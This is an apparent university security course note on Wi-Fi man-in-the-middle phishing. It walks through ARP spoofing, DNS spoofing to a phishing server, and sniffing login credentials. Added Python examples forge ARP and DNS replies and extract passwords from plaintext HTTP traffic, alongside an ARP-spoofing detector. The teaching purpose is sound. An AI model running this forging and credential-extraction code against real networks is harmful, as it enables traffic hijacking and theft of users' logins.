[Intro. to Computer Security Course Note] Ch 24 (supplement 1)

Ch24 Supplement. Phishing Attacks in Wi-Fi Networks


Goal

  • Understand how user credentials can be leaked by a man-in-the-middle phishing attack over Wi-Fi networks
  • Expected to learn
    • How to identify a victim’s device?
    • How to redirect the victim’s traffic to our attack machine?
    • How to steal user credentials from intercepted data packets?
    • How to return phishing web pages to the victim?

Scenario

Four Tasks

  • Discover the IP/MAC addresses of a target victim device from a Wi-Fi network
  • Redirect all the traffic of the victim device to your attack device
  • Redirect the victim device to access a phishing web page
  • Launch a man-in-the-middle attack to steal the victim’s credentials

Task I

  • Discover the IP/MAC addresses of a target victim device from a Wi-Fi network
    • e.g., using “Fing” (a network scanner that lists the IP and MAC address of every host on the LAN)

What is ARP (Address Resolution Protocol)

  • A communication protocol used for discovering the link-layer (MAC) address associated with a given IP address
  • A request-response protocol whose messages are encapsulated directly in a link-layer frame (not in IP)
  • Works only within the boundaries of a single link-layer network; ARP messages are never routed across internetworking nodes (routers)
  • ARP has no authentication: a host accepts any reply (even one it never asked for) and updates its ARP cache accordingly, which is what ARP spoofing exploits

Task II

  • Redirect all the traffic of the victim device to your attack device
    • Launch ARP spoofing: send forged ARP replies to the victim claiming the gateway’s IP, and to the gateway claiming the victim’s IP, so both ARP caches now map those IPs to the attacker’s MAC
    • Enable IP forwarding on the attack device, otherwise the victim loses connectivity and the attack is noticed
  • If the attack is successful
    • the victim’s traffic will be forwarded through the attacker for both uplink (victim → gateway) and downlink (gateway → victim)
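The two ARP passages above (the protocol description and the cache-poisoning attack of Task II) share the same packet format, so here is one added example for both. It is not code from the course material; it builds ARP request/reply frames by hand (the RFC 826 layout), parses them back, and runs a small detector over a constructed frame sequence in which a forged reply rebinds the gateway IP to a different MAC. All MAC and IP addresses are made up for the example.

```python
import struct

ETH_P_ARP = 0x0806
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP message (RFC 826 layout).

    A request is broadcast (this is what a LAN scanner such as Fing
    sends for each address in the subnet); a reply is unicast."""
    dst = BROADCAST_MAC if op == ARP_REQUEST else target_mac
    eth = mac_bytes(dst) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, operation
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    body = frame[14:42]
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", body[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(body[8:14]),
        "sender_ip": ip_str(body[14:18]),
        "target_mac": mac_str(body[18:24]),
        "target_ip": ip_str(body[24:28]),
    }


def detect_arp_spoofing(frames):
    """Replay frames through an IP -> MAC table (the first binding seen
    is trusted, as a real host's cache would) and flag every reply that
    claims an already-known IP from a different MAC."""
    table, alerts = {}, []
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip in table and table[ip] != mac:
            alerts.append((ip, table[ip], mac))
        else:
            table.setdefault(ip, mac)
    return alerts


# Constructed scenario (hypothetical addresses): the victim asks for the
# gateway, the real gateway answers, then the attacker sends a forged
# reply for the same IP from its own MAC.
VICTIM_MAC, VICTIM_IP = "aa:bb:cc:dd:ee:01", "192.168.1.10"
GATEWAY_MAC, GATEWAY_IP = "00:11:22:33:44:55", "192.168.1.1"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def demo_poisoning():
    frames = [
        build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP),
        build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    ]
    return detect_arp_spoofing(frames)


if __name__ == "__main__":
    for ip, old, new in demo_poisoning():
        print(f"ARP spoofing: {ip} moved from {old} to {new}")
```

The detector is the same idea tools such as arpwatch use: remember the first MAC seen for each IP and alert on a change. A victim host does the opposite, overwriting its cache with whatever arrived last, which is why the forged reply wins.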

What is DNS (Domain Name System) Service?

  • A hierarchical decentralized naming system for computers, services, or other resources connected to the Internet or a private network
  • The resolution of the hierarchical name space is done by a hierarchy of name servers
  • Each server is responsible (authoritative) for a contiguous portion of the DNS namespace called a zone
  • A DNS server answers queries about hosts in its zone

DNS Address Resolution

  • Domain name resolvers determine the name servers responsible for the domain name in question by a sequence of queries that starts at the root and the right-most (top-level) label and walks down one label at a time
  • A stub resolver (the client) accepts the first response whose transaction ID and question match its query; it cannot tell whether the reply came from the real server

Task III

  • Redirect the victim device to access a phishing web page
    • Launch DNS spoofing: with the ARP man-in-the-middle in place, the attacker sees the victim’s DNS query and answers it first with a forged response
    • e.g., using “Ettercap”
  • If the attack is successful
    • An access request to the NCTU home page will be redirected to the attack server (140.113.207.243)
    • The attacker can reply with a fake, phishing web page
  • Caveat: the redirection is invisible to the victim only for plain HTTP; for an HTTPS site the attacker’s server cannot present a valid certificate, and the browser will warn
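An added example (not code from the course or from Ettercap) of the DNS message exchange behind Task III. It builds a victim's A query by hand, forges the response an on-path attacker would send (same transaction ID and question, one A record pointing at the attack server 140.113.207.243 from the slide), and implements the acceptance check a stub resolver makes, showing that a response whose ID does not match is dropped. The query name www.nctu.edu.tw and the transaction ID are assumptions for the example.

```python
import struct

TYPE_A, CLASS_IN = 1, 1
FLAGS_QUERY = 0x0100     # RD=1
FLAGS_RESPONSE = 0x8180  # QR=1, RD=1, RA=1, RCODE=0


def encode_name(name):
    """www.example.com -> b'\\x03www\\x07example\\x03com\\x00'"""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(msg, off):
    """Decode a name at offset off, following compression pointers."""
    labels = []
    while True:
        n = msg[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:  # two-byte pointer into the message
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            name, _ = decode_name(msg, ptr)
            labels.append(name)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + n].decode())
        off += 1 + n


def build_query(txid, name):
    hdr = struct.pack("!HHHHHH", txid, FLAGS_QUERY, 1, 0, 0, 0)
    return hdr + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_query(msg):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    name, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": msg[12:off + 4]}


def forge_response(query, spoofed_ip, ttl=300):
    """What the on-path attacker sends back: the victim's own ID and
    question, plus one A record for the attacker's server."""
    q = parse_query(query)
    hdr = struct.pack("!HHHHHH", q["id"], FLAGS_RESPONSE, 1, 1, 0, 0)
    # 0xC00C = compression pointer to the question name at offset 12
    rr = struct.pack("!HHHIH", 0xC00C, TYPE_A, CLASS_IN, ttl, 4)
    return hdr + q["question"] + rr + bytes(int(o) for o in spoofed_ip.split("."))


def parse_response(msg):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_A:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return txid, flags, answers


def stub_accepts(query, response):
    """The checks a stub resolver makes before trusting a response:
    QR bit set, matching transaction ID, matching question section.
    An on-path attacker satisfies all three because it saw the query."""
    q = parse_query(query)
    txid, flags, _ = parse_response(response)
    _, off = decode_name(response, 12)
    return bool(flags & 0x8000) and txid == q["id"] and response[12:off + 4] == q["question"]


ATTACK_SERVER = "140.113.207.243"
VICTIM_QUERY = build_query(0x1A2B, "www.nctu.edu.tw")  # constructed query


if __name__ == "__main__":
    spoofed = forge_response(VICTIM_QUERY, ATTACK_SERVER)
    print(parse_response(spoofed)[2], stub_accepts(VICTIM_QUERY, spoofed))
```

Because UDP DNS carries no authentication, ID and question equality are the only checks the client makes; an attacker that is not on the path would have to guess the 16-bit ID and source port, which is why the ARP man-in-the-middle of Task II is the prerequisite for this task.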

Task IV

  • Launch a man-in-the-middle attack to steal the victim’s credentials
    • Launch ARP spoofing (but no DNS spoofing), so the victim reaches the real site through the attacker
    • Use “Wireshark” on the attack device to capture and analyze the intercepted packets (e.g., filter on http.request.method == "POST")
    • From the victim device, access a web page from the link and submit a login form
  • If the attack is successful
    • You can read the user credentials directly from the intercepted packets
  • Prerequisite: the web page must be served over plain HTTP (not HTTPS); over TLS the intercepted packets carry only ciphertext
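An added example for Task IV, not code from the course: the extraction that Wireshark does for you, written out for a raw TCP payload as the attacker would see it after ARP spoofing. It parses an HTTP/1.x request and pulls credentials from a URL-encoded login form or from an HTTP Basic Authorization header; fed a TLS record instead, it finds nothing, which is the point of the prerequisite. The sample requests, hostnames and credentials are constructed for the example.

```python
import base64
from urllib.parse import parse_qs

# Form field names commonly used for logins (assumed list for the example).
CREDENTIAL_KEYS = {"username", "user", "login", "email", "password", "passwd", "pwd"}


def parse_http_request(payload):
    """Split a raw HTTP/1.x request into method, target, headers and body.
    Returns None if the bytes are not a plaintext HTTP request (e.g. TLS)."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    length = int(headers.get("content-length", 0))
    return {"method": parts[0], "target": parts[1], "headers": headers,
            "body": body[:length]}


def extract_credentials(payload):
    """Return {field: value} for every credential found in one request."""
    req = parse_http_request(payload)
    if req is None:
        return {}
    found = {}
    auth = req["headers"].get("authorization", "")
    if auth.lower().startswith("basic "):
        # Basic auth is only base64, not encryption
        user, _, pw = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        found.update({"username": user, "password": pw})
    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        for key, values in parse_qs(req["body"].decode("latin-1")).items():
            if key.lower() in CREDENTIAL_KEYS:
                found[key] = values[0]
    return found


# Constructed samples: a plaintext login POST, a Basic-auth GET, and the
# first bytes of a TLS 1.x ClientHello record (what HTTPS would show).
SAMPLE_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: portal.example.edu\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"username=alice&password=s3cret%21"
)
SAMPLE_BASIC = (
    b"GET /api/me HTTP/1.1\r\n"
    b"Host: portal.example.edu\r\n"
    b"Authorization: Basic YWxpY2U6czNjcmV0\r\n"
    b"\r\n"
)
SAMPLE_TLS = b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03" + b"\x00" * 32


def demo():
    return [extract_credentials(p) for p in (SAMPLE_POST, SAMPLE_BASIC, SAMPLE_TLS)]


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The same logic run over a real capture needs the TCP stream reassembled first (Wireshark's "Follow TCP Stream" does this); a login POST split across segments will not parse from a single packet.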